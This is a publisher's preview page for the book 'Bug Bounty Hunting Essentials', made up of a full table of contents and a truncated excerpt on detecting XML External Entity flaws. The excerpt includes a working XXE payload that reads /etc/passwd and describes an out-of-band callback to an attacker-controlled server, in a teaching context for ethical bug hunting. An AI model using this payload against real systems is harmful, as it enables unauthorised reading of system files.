XML External Entity Vulnerability | Bug Bounty Hunting Essentials

Sign In Start Free Trial

Book Overview & Buying
Table Of Contents

Bug Bounty Hunting Essentials

By : Shahmeer Amir , Carlos A. Lozano

3.3 (3)

Bug Bounty Hunting Essentials

3.3 (3)

By: Shahmeer Amir , Carlos A. Lozano

Overview of this book

Bug bounty programs are the deals offered by prominent companies where-in any white-hat hacker can find bugs in the applications and they will have a recognition for the same. The number of prominent organizations having this program has increased gradually leading to a lot of opportunity for Ethical Hackers. This book will initially start with introducing you to the concept of Bug Bounty hunting. Then we will dig deeper into concepts of vulnerabilities and analysis such as HTML injection, CRLF injection and so on. Towards the end of the book, we will get hands-on experience working with different tools used for bug hunting and various blogs and communities to be followed. This book will get you started with bug bounty hunting and its fundamentals.

Preface

Preface

Who this book is for

What this book covers

Get in touch

Disclaimer

Free Chapter

Basics of Bug Bounty Hunting

Basics of Bug Bounty Hunting

Bug bounty hunting platforms

Types of bug bounty program

Bug bounty hunter statistics

Bug bounty hunting methodology

How to become a bug bounty hunter

Rules of bug bounty hunting

Summary

How to Write a Bug Bounty Report

How to Write a Bug Bounty Report

Prerequisites of writing a bug bounty report

Salient features of a bug bounty report

Format of a bug bounty report

Responding to the queries of the team

Summary

SQL Injection Vulnerabilities

SQL Injection Vulnerabilities

SQL injection

Types of SQL injection vulnerability

Goals of an SQL injection attack for bug bounty hunters

Uber SQL injection

Grab taxi SQL Injection

Zomato SQL injection

LocalTapiola SQL injection

Summary

Cross-Site Request Forgery

Cross-Site Request Forgery

Protecting the cookies

Why does the CSRF exist?

Detecting and exploiting CSRF

XSS – CSRF's best friend

Cross-domain policies

CSRF in the wild

Summary

Application Logic Vulnerabilities

Application Logic Vulnerabilities

Origins

Following the flow

Application logic vulnerabilities in the wild

Summary

Cross-Site Scripting Attacks

Cross-Site Scripting Attacks

Types of cross-site scripting

How do we detect XSS bugs?

Workflow of an XSS attack

Real bug bounty examples

Summary

SQL Injection

SQL Injection

Origin

Example

Automation

SQL injection in Drupal

Summary

Open Redirect Vulnerabilities

Open Redirect Vulnerabilities

Redirecting to another URL

Constructing URLs

Executing code

URL shorteners

Why do open redirects work?

Detecting and exploiting open redirections

Exploitation

Impact

Black and white lists

Open redirects in the wild

Summary

Sub-Domain Takeovers

Sub-Domain Takeovers

The sub-domain takeover

Internet-wide scans

Exploitation

Mitigation

Sub-domain takeovers in the wild

Summary

XML External Entity Vulnerability

XML External Entity Vulnerability

How XML works

How is an XXE produced?

Detecting and exploiting an XXE

Templates

XXEs in the wild

Summary

Template Injection

Template Injection

What's the problem?

Detection

Exploitation

Mitigation

SSTI in the wild

Summary

Top Bug Bounty Hunting Tools

Top Bug Bounty Hunting Tools

HTTP proxies, requests, responses, and traffic analyzers

Automated vulnerability discovery and exploitation

Recognize

Extensions

Summary

Top Learning Resources

Top Learning Resources

Training

Books and resources

CTFs and wargames

YouTube channels

Social networks and blogs

Meetings and networking

Conferences

Podcasts

Summary

Other Books You May Enjoy

Other Books You May Enjoy

Leave a review - let other readers know what you think

Detecting and exploiting an XXE

The process to detect this kind vulnerability in general is as follows:

If it's possible, download an XML document generated by the application so you know the structure. If not, create a simple template, like this:

<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [ 
<!ELEMENT foo ANY > 
<!ENTITY xxe SYSTEM "file:///etc/passwd" > 
] 
> 
<foo>&xxe;</foo>

See if it's possible to add a reference to a resource; a good trick that's commonly used by attackers is to generate a reverse response that could be captured in a server where we have control—something like this:

GET 144.76.194.66 /XXE/ 10/29/15 1:02 PM Java/1.7.0_51

If it's not possible to add an external reference, but you receive an error, modify the request and submit tags:

<cosa></cosa>

To test. If the error disappears, it means that the parser is accepting the tags as valid, so it might be vulnerable.

Also, you can try entering data before or in...

CONTINUE READING

83

Tech Concepts

36

Programming languages

73

Tech Tools

Unlimited access to the largest independent learning library in tech of over 8,000 expert-authored tech books and videos.

Innovative learning tools, including AI book assistants, code context explainers, and text-to-speech.

50+ new titles added per month and exclusive early access to books as they are being written.

Bug Bounty Hunting Essentials

Search

Your notes and bookmarks